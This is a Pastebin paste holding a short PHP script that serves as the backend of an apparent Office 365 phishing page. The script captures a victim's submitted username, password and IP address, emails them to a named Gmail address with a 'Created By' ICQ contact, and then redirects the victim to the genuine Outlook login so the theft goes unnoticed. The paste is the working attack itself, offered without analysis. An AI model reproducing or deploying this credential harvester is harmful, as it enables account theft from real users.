Guest User

https://coffeeee.gq/weak/office/cok.php

a guest
Feb 13th, 2018
36
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.62 KB | None | 0 0
  1. <?
  2. $ip = getenv("REMOTE_ADDR");
  3. $message .= "----------------------Result--------------------------------\n";
  4. $message .= "Username: ".$_POST['username']."\n";
  5. $message .= "Password: ".$_POST['password']."\n";
  6. $message .= "IP: ".$ip."\n";
  7. $message .= "----------------------Created By ICQ : 703959893---------------------\n";
  8. $send = "scott.bb.tools@gmail.com";
  9. $subject = "Office365 ReZulTs";
  10. $headers = "From: Scott<scott.bb.tools@gmail.com>";
  11. $headers .= $_POST['eMailAdd']."\n";
  12. $headers .= "MIME-Version: 1.0\n";
  13. mail("$send",$subject,$message,$headers);
  14. header("Location: https://outlook.office365.com");
  15.  
  16.  
  17. ?>
Add Comment
Please, Sign In to add comment